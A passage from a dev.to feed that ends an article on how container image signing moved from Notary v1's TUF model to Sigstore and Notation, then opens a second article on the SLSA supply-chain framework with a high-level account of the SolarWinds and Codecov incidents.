&lt;td&gt;Docker Content Trust (DCT) released with Docker Engine 1.8. Notary v1, running underneath, is a pure TUF implementation. Signatures stored on a &lt;strong&gt;separate Notary server, not the registry&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2017.10&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CNCF accepts Notary and TUF as Incubating projects.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2019.11&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Notary v2 discussions kick off at KubeCon NA (San Diego). The following month, a kickoff meeting is held at Amazon's Seattle office with Docker, Microsoft, Amazon, Google, Red Hat, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2021.06&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sigstore holds its first Root Key Ceremony (6/18). TUF is used only for "distributing root certificates."&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2023.08&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Notary v2 (Notation) v1.0.0 released (8/15). &lt;strong&gt;TUF completely dropped.&lt;/strong&gt; Same month, Harbor 2.9.0 &lt;strong&gt;fully removes Notary v1&lt;/strong&gt; (deprecation began in 2.6.0).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2024.02&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OCI Image/Distribution Specification v1.1.0 officially released. &lt;strong&gt;Referrers API&lt;/strong&gt; standardized, formalizing in-registry signature storage.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2025.03&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Azure Container Registry begins DCT deprecation (full removal scheduled for 2028.03).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2025.08&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Docker Official Images' DCT signing certificate expires (8/8). &lt;code&gt;DOCKER_CONTENT_TRUST=1&lt;/code&gt; pulls start failing. DCT is effectively dead. Usage was &lt;strong&gt;less than 0.05%&lt;/strong&gt; of all pulls.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Generation One: Notary v1 (Going All-In on TUF, 2015〜2025)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Architecture: A TUF Server "Next To" the Registry
&lt;/h3&gt;

&lt;p&gt;In August 2015, Docker released Docker Content Trust (DCT). Setting &lt;code&gt;DOCKER_CONTENT_TRUST=1&lt;/code&gt; makes &lt;code&gt;docker push&lt;/code&gt; automatically sign images and &lt;code&gt;docker pull&lt;/code&gt; automatically verify them.&lt;/p&gt;

&lt;p&gt;Underneath was &lt;strong&gt;Notary v1&lt;/strong&gt;. It was a textbook TUF implementation: a Notary server running at a &lt;strong&gt;separate URL&lt;/strong&gt; from Docker Hub, holding the full set of TUF metadata. Quick recap of the four roles:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;File&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Key location&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🏛️ Root&lt;/td&gt;
&lt;td&gt;&lt;code&gt;root.json&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Anchor of trust. Declares public keys for the other 3 roles.&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Offline&lt;/strong&gt; (in a vault)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🎯 Targets&lt;/td&gt;
&lt;td&gt;&lt;code&gt;targets.json&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Records and signs the digests of images you want to protect.&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Offline&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;📸 Snapshot&lt;/td&gt;
&lt;td&gt;&lt;code&gt;snapshot.json&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Guarantees consistency across metadata (prevents mix-and-match).&lt;/td&gt;
&lt;td&gt;Online&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;⏱️ Timestamp&lt;/td&gt;
&lt;td&gt;&lt;code&gt;timestamp.json&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Freshness guarantee (prevents replay). Short expiration.&lt;/td&gt;
&lt;td&gt;Online&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;An "offline key" is a key kept on an air-gapped machine or in a physical vault; an "online key" is one that lives on a server for automated updates. &lt;strong&gt;Keeping the Targets key offline&lt;/strong&gt; is the foundation of TUF's security model. This is exactly where things later explode.&lt;/p&gt;

&lt;h4&gt;
  
  
  Push Flow
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsl3jo0w2109r7dfr97w1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsl3jo0w2109r7dfr97w1.png" alt="push flow" width="800" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The CLI computes the Manifest's Digest, signs an updated &lt;code&gt;targets.json&lt;/code&gt; with the local Targets key, and uploads it. Step ② is an internal "use the key" operation (dotted line), not a network transfer.&lt;/p&gt;

&lt;h4&gt;
  
  
  Pull Verification Flow
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxu31536u23m4bh1fhi2o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxu31536u23m4bh1fhi2o.png" alt="pull verification flow" width="652" height="777"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Walk Root → Timestamp → Snapshot → Targets, then compare the actual image's Digest from the registry against the record in &lt;code&gt;targets.json&lt;/code&gt;. All four TUF roles in full motion: a spec-faithful architecture.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why It Imploded
&lt;/h3&gt;

&lt;p&gt;A theoretically correct architecture collapsed completely in practice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. It forced developers to manage signing keys&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every &lt;code&gt;docker push&lt;/code&gt; prompted for the local Targets key passphrase. Maybe tolerable for solo developers, but for the modern "automate the push from CI/CD" workflow, this was fatal.&lt;/p&gt;

&lt;p&gt;To wire it into CI, you had to put the Targets key (which was supposed to live offline in a vault) into the CI's secret store. &lt;strong&gt;"Putting the offline key online"&lt;/strong&gt;: a contradiction. This breaks the foundation of TUF's security model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Lose the key = repository death&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you lose the Targets key, you can never sign images for that repository again. Key rotation must follow the TUF spec exactly, and the handoff overhead in team development was a nightmare.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Mismatch with the reality of distributed registries&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This was the deepest structural problem. Container images don't deploy only to Docker Hub. AWS ECR, GCP Artifact Registry, Azure Container Registry, GitHub Container Registry, internal Harbor instances... registries are scattered everywhere.&lt;/p&gt;

&lt;p&gt;In the Notary v1 model, every registry needed its own Notary server. Copy an image between registries, and the signature doesn't follow. The industry looked at that operational cost and said "no."&lt;/p&gt;

&lt;h3&gt;
  
  
  The Death of DCT: The Numbers Tell the Story
&lt;/h3&gt;

&lt;p&gt;In the end, fewer than &lt;strong&gt;0.05%&lt;/strong&gt; of all Docker Hub pulls had DCT enabled.&lt;/p&gt;

&lt;p&gt;On August 8, 2025, the oldest DCT signing certificates for Docker Official Images (&lt;code&gt;nginx&lt;/code&gt;, &lt;code&gt;ubuntu&lt;/code&gt;, etc.) expired. Users with &lt;code&gt;DOCKER_CONTENT_TRUST=1&lt;/code&gt; could no longer pull even the official images. Docker's response: "Please disable the &lt;code&gt;DOCKER_CONTENT_TRUST&lt;/code&gt; environment variable." DCT quietly died.&lt;/p&gt;

&lt;p&gt;Azure Container Registry began DCT deprecation in March 2025, with full removal scheduled for March 2028. Harbor moved earlier, fully removing Notary v1 in v2.9.0 back in 2023.&lt;/p&gt;




&lt;h2&gt;
  
  
  Generation Two: The OCI Registry-Native Era (2023〜present)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Pivot: Put Signatures "Inside the Registry"
&lt;/h3&gt;

&lt;p&gt;What the industry learned from Notary v1's failure: &lt;strong&gt;"Standing up a separate server just for signing doesn't work operationally."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The answer: store signature data directly in the same OCI registry as the image, &lt;strong&gt;as another OCI artifact&lt;/strong&gt; (a blob conforming to the OCI spec). No extra registry to run. Copy the image between registries, and the signature comes along.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;OCI Distribution Specification v1.1.0&lt;/strong&gt;, released in February 2024, formally standardized this approach. It introduced the &lt;strong&gt;Referrers API&lt;/strong&gt; (&lt;code&gt;GET /v2/&amp;lt;name&amp;gt;/referrers/&amp;lt;digest&amp;gt;&lt;/code&gt;), letting clients list all related artifacts (signatures, SBOMs, vulnerability scan results) attached to a given image's Digest.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5uzwfcz6pa8fw6zhac35.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5uzwfcz6pa8fw6zhac35.png" alt="Referrers API" width="800" height="303"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Each artifact (signature, SBOM, etc.) points back to the parent image via a &lt;code&gt;subject&lt;/code&gt; field. Verifier tools call the Referrers API to enumerate them and pick what they need to verify. No separate Notary server required.&lt;/p&gt;

&lt;p&gt;Note: in production you usually pick &lt;strong&gt;either Cosign or Notation, not both&lt;/strong&gt; (drawing them side-by-side just shows that both ride on the same spec). On top of this foundation, two signing projects are now competing for dominance.&lt;/p&gt;

&lt;h3&gt;
  
  
  Sigstore (cosign): The "Selective Bite" of TUF
&lt;/h3&gt;

&lt;p&gt;Sigstore made a clean call. &lt;strong&gt;Stop using TUF's &lt;code&gt;targets.json&lt;/code&gt; to manage image hashes. But don't throw TUF away entirely.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Sigstore uses TUF in exactly one place: &lt;strong&gt;safely distributing the root certificate of Fulcio (the signing CA) and the public key of Rekor (the transparency log) to clients.&lt;/strong&gt; The first time you run &lt;code&gt;cosign&lt;/code&gt;, a TUF client behind the scenes walks &lt;code&gt;root.json&lt;/code&gt; → &lt;code&gt;timestamp.json&lt;/code&gt; → &lt;code&gt;snapshot.json&lt;/code&gt; → &lt;code&gt;targets.json&lt;/code&gt; to fetch the certificates and public keys you should trust.&lt;/p&gt;

&lt;p&gt;The heavy use case TUF was originally built for, "managing hashes of hundreds of thousands of packages," was abandoned. Sigstore kept only the lightweight role TUF excels at: "safely distributing root certificates."&lt;/p&gt;

&lt;p&gt;Sigstore also gave a fundamental answer to the "key management is unbearable" problem that killed Notary v1: &lt;strong&gt;don't make developers hold private keys at all (keyless signing).&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You authenticate via an OIDC (OpenID Connect, the standard protocol for ID token issuance) provider (GitHub, Google, etc.), Fulcio issues a short-lived certificate that expires in 10 minutes, and you sign with that certificate. The fact of signing is permanently recorded in Rekor's transparency log. The private key exists for a few seconds in memory and disappears. There is no key to manage in the first place.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gsksdc1059rko53set.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gsksdc1059rko53set.png" alt="sigstore" width="800" height="560"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The revolutionary move: abandon the very idea of "protect the key" and replace it with "sign with a short-lived key, and leave only the signing trace in a public log forever."&lt;/p&gt;

&lt;h3&gt;
  
  
  Notary v2 (Notation): Total Abandonment of TUF
&lt;/h3&gt;

&lt;p&gt;The next-generation Notary project, led by Docker and Microsoft. v1.0.0 released in August 2023. Active development continues as a CNCF Incubating project.&lt;/p&gt;

&lt;p&gt;Notary v2 &lt;strong&gt;completely dropped the TUF specification&lt;/strong&gt;. The four-role structure of Root, Targets, Snapshot, Timestamp is not used at all. Instead, it builds trust on &lt;strong&gt;X.509 certificate chains&lt;/strong&gt; (the same mechanism as HTTPS certificates: trust propagates hierarchically from CA to intermediate CA to leaf certificate), a mechanism battle-tested for decades on the Web.&lt;/p&gt;

&lt;p&gt;The mechanics are identical to SSL/TLS certificate verification. Signers hold X.509 certificates issued by a Certificate Authority (CA). Verifiers maintain a trust store (a list of CAs they trust) and walk the certificate chain attached to the signature to decide whether to trust it. TUF's complex chain of metadata is replaced with existing PKI infrastructure.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynb1v7r9xog6cdasitgl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynb1v7r9xog6cdasitgl.png" alt="notation" width="749" height="1106"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You don't need to hold keys locally. Plugins connect to cloud KMS services like AWS Signer, Azure Key Vault, or HashiCorp Vault, delegating the signing operation. It also integrates with Kubernetes admission controllers (Ratify, Kyverno) so signature verification can be wired into deployment gates.&lt;/p&gt;

&lt;h3&gt;
  
  
  Comparing the Three Approaches
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Notary v1 (DCT)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Sigstore (cosign)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Notary v2 (Notation)&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Use of TUF&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Full implementation (4 roles)&lt;/td&gt;
&lt;td&gt;Root certificate distribution only&lt;/td&gt;
&lt;td&gt;Not used&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Signature storage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Notary server (separate infra)&lt;/td&gt;
&lt;td&gt;Inside OCI registry&lt;/td&gt;
&lt;td&gt;Inside OCI registry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Key management&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Developer manages locally&lt;/td&gt;
&lt;td&gt;None (keyless signing)&lt;/td&gt;
&lt;td&gt;Delegated to cloud KMS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Trust model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;TUF Root of Trust&lt;/td&gt;
&lt;td&gt;TUF + transparency log (Rekor)&lt;/td&gt;
&lt;td&gt;X.509 certificate chain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD fit&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Requires passphrase entry&lt;/td&gt;
&lt;td&gt;✅ Fully automated via OIDC&lt;/td&gt;
&lt;td&gt;✅ Automated via KMS plugin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Status (2026)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Archived&lt;/td&gt;
&lt;td&gt;✅ Adopted by npm, PyPI, Maven&lt;/td&gt;
&lt;td&gt;✅ CNCF Incubating&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Sidebar: Why Does TUF Work for PyPI?
&lt;/h2&gt;

&lt;p&gt;If you've read this far, this question should be nagging you.&lt;/p&gt;

&lt;p&gt;Notary v1 imploded over "key management is too hard." So how does Python's PyPI, which hosts over 500,000 packages, manage to make TUF (PEP 458) actually work?&lt;/p&gt;

&lt;p&gt;The answer comes down to two structural differences.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Developers don't sign anything
&lt;/h3&gt;

&lt;p&gt;PyPI's TUF deployment (PEP 458) is designed to protect the channel &lt;strong&gt;between the PyPI servers and the &lt;code&gt;pip&lt;/code&gt; command&lt;/strong&gt;. Developers just upload packages to PyPI as before. PyPI's backend automatically computes hashes and &lt;strong&gt;signs &lt;code&gt;targets.json&lt;/code&gt; using PyPI's own online keys&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Developers don't even need to know TUF exists. This is the polar opposite of Notary v1, which forced developers to hold TUF's offline keys.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Centralized vs. distributed
&lt;/h3&gt;

&lt;p&gt;Python packages all converge on a &lt;strong&gt;single central server&lt;/strong&gt;: &lt;code&gt;pypi.org&lt;/code&gt;. Run one TUF server, and you cover all 500,000 packages.&lt;/p&gt;

&lt;p&gt;Container image registries, by contrast, are &lt;strong&gt;distributed across many places&lt;/strong&gt;: Docker Hub, ECR, GCR, ACR, Harbor... Notary v1 required a TUF server per registry, and operational costs exploded.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;PyPI&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Container ecosystem&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Registry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;One: &lt;code&gt;pypi.org&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Docker Hub, ECR, GCR, ACR, Harbor...&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Who manages TUF&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;PyPI server (automatic)&lt;/td&gt;
&lt;td&gt;Developers themselves (Notary v1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Result&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Developers don't see TUF&lt;/td&gt;
&lt;td&gt;❌ Developers burned out on key management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;PyPI also spent years exploring "end-to-end signing by developers themselves" as &lt;strong&gt;PEP 480&lt;/strong&gt;. But ultimately it gave up on forcing TUF-based key management onto developers and pivoted to &lt;strong&gt;Trusted Publishers&lt;/strong&gt; (launched April 2023) using GitHub Actions OIDC. This is the same "OIDC + short-lived tokens" approach as Sigstore.&lt;/p&gt;

&lt;p&gt;Docker, PyPI, npm: they all converged on the same conclusion. &lt;strong&gt;"Making developers manage private keys does not work."&lt;/strong&gt; Notary v1's death is a lesson the entire industry has internalized.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;"How do you protect the hash of a container image with TUF's Targets?"&lt;/p&gt;

&lt;p&gt;In the old days, you protected it with &lt;code&gt;targets.json&lt;/code&gt; (Notary v1). But in a distributed container ecosystem, the model that asks developers to manage offline keys completely fell apart. Today, instead of managing the image Digest directly with TUF, signatures are stored directly in the OCI registry (Sigstore / Notary v2).&lt;/p&gt;

&lt;p&gt;Security that nobody uses is not security. The decade of Notary v1 proved that.&lt;/p&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.docker.com/blog/retiring-docker-content-trust/" rel="noopener noreferrer"&gt;Docker Blog: Retiring Docker Content Trust&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.infoq.com/news/2025/08/docker-content-trust-retirement/" rel="noopener noreferrer"&gt;InfoQ: Docker Retires Docker Content Trust with Less Than 0.05% of Image Pulls Using DCT&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-content-trust" rel="noopener noreferrer"&gt;Microsoft: Deprecation of Docker Content Trust on Azure Container Registry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.docker.com/blog/notary-v2-and-signing-requirements/" rel="noopener noreferrer"&gt;Docker Blog: Notary v2 and Signing Requirements (Dec 2019 kickoff)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/goharbor/harbor/wiki/Harbor-Notary-v1-Migration-Guide" rel="noopener noreferrer"&gt;Harbor: Notary v1 Removal (v2.9.0)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/opencontainers/distribution-spec/releases/tag/v1.1.0" rel="noopener noreferrer"&gt;OCI Distribution Specification v1.1.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://notaryproject.dev/" rel="noopener noreferrer"&gt;Notary Project (Notation)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.sigstore.dev/" rel="noopener noreferrer"&gt;Sigstore&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.sigstore.dev/sigstore-root-key-ceremony/" rel="noopener noreferrer"&gt;Sigstore Blog: Root Key Ceremony (June 18, 2021)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://peps.python.org/pep-0458/" rel="noopener noreferrer"&gt;PEP 458: Secure PyPI downloads with signed repository metadata&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://peps.python.org/pep-0480/" rel="noopener noreferrer"&gt;PEP 480: Surviving a Compromise of PyPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.pypi.org/posts/2023-04-20-introducing-trusted-publishers/" rel="noopener noreferrer"&gt;PyPI Blog: Trusted Publishers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>docker</category>
      <category>supplychain</category>
      <category>sigstore</category>
    </item>
    <item>
      <title>SLSA Deep Dive: Securing the Supply Chain Using Verifiable Levels</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sun, 26 Apr 2026 04:59:20 +0000</pubDate>
      <link>https://dev.to/kanywst/slsa-deep-dive-securing-the-supply-chain-using-verifiable-levels-klk</link>
      <guid>https://dev.to/kanywst/slsa-deep-dive-securing-the-supply-chain-using-verifiable-levels-klk</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;When I first investigated the SolarWinds incident, one technical detail absolutely floored me.&lt;/p&gt;

&lt;p&gt;The attackers planted malware called &lt;strong&gt;SUNSPOT&lt;/strong&gt; on SolarWinds' build servers. SUNSPOT monitored the build process every single second, and the moment the Orion platform build kicked off, it swapped the &lt;code&gt;InventoryManager.cs&lt;/code&gt; source code with a backdoored version. Once the build finished, it swapped it back. Zero traces were left in the source code repository. The resulting binary was signed with a perfectly legitimate SolarWinds certificate and shipped to over 18,000 organizations.&lt;/p&gt;

&lt;p&gt;The most terrifying part of this attack? &lt;strong&gt;The signature was 100% valid.&lt;/strong&gt; Code signing only guarantees "this signer signed this file." It completely fails to guarantee "this binary was built from the correct source code via an untampered build process."&lt;/p&gt;

&lt;p&gt;The Codecov incident later that year shared a similar structure. Attackers used leaked credentials to upload a malicious script directly into an GCS bucket, completely bypassing the build process. Users downloaded it directly. An artifact that never even touched the build process was distributed as legitimate.&lt;/p&gt;

&lt;p&gt;So, what would have stopped this? What we need is &lt;strong&gt;verifiable evidence&lt;/strong&gt; recording "which source this binary came from, on what platform it was built, and exactly how it was produced."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SLSA (Supply-chain Levels for Software Artifacts, pronounced 'salsa')&lt;/strong&gt; is a framework explicitly designed to generate and verify this exact evidence. Google proposed it in 2021, and it's now an OpenSSF project. v1.1 was officially approved in April 2025, and v1.2, which introduced the Source Track, dropped in November 2025.&lt;/p&gt;

&lt;p&gt;In this deep dive, we are ripping through the primary SLSA specification to explain exactly what we are protecting and how we protect it.&lt;/p&gt;




&lt;h2&gt;
  
  
  Prerequisites: What You Need to Know
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is the Supply Chain?
&lt;/h3&gt;

&lt;p&gt;The software supply chain encompasses every single step from writing code to running it on a user's machine.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0mksfd1w6s3ofj5hjbyp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0mksfd1w6s3ofj5hjbyp.png" alt="Supply Chain" width="800" height="105"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Between &lt;code&gt;git push&lt;/code&gt; and &lt;code&gt;npm install&lt;/code&gt; or &lt;code&gt;docker pull&lt;/code&gt;, a massive amount of infrastructure intervenes: the build platform, dependency resolution, publishing, and distribution. &lt;strong&gt;Every single point in this diagram is a target.&lt;/strong&gt; SolarWinds was a compromise of the "Build Platform," while Codecov was an attack on the "Distribution."&lt;/p&gt;

&lt;h3&gt;
  
  
  The Limits of Code Signing
&lt;/h3&gt;

&lt;p&gt;Digital signatures guarantee exactly two things: "The owner of the private key signed this," and "It hasn't been modified since." That's it. It guarantees absolutely nothing else.&lt;/p&gt;

&lt;p&gt;SUNSPOT swapped the source code &lt;em&gt;during&lt;/em&gt; the build. The resulting binary was then signed with a legitimate certificate. &lt;strong&gt;The signature was mathematically perfect. But nobody could verify the relationship between the source code and the final binary.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is the massive blind spot SLSA aims to fix.&lt;/p&gt;

&lt;h3&gt;
  
  
  Terminology Checklist
&lt;/h3&gt;

&lt;p&gt;Let's nail down the jargon before we proceed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Provenance&lt;/strong&gt;: Verifiable metadata describing "where," "how," and "from what" a software artifact was created. The core concept of SLSA.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attestation&lt;/strong&gt;: An authenticated statement about a software artifact. Provenance is a type of Attestation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;in-toto&lt;/strong&gt;: A framework to secure the software supply chain. SLSA uses its Attestation format.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DSSE (Dead Simple Signing Envelope)&lt;/strong&gt;: The envelope format used to sign Attestations. It wraps a JSON payload with a digital signature.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Build Platform&lt;/strong&gt;: A hosted service that executes the build (e.g., GitHub Actions, Google Cloud Build).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Control Plane&lt;/strong&gt;: The management component inside the build platform that controls execution and generates Provenance. It is strictly isolated from user-defined build steps (the data plane).&lt;/li&gt;
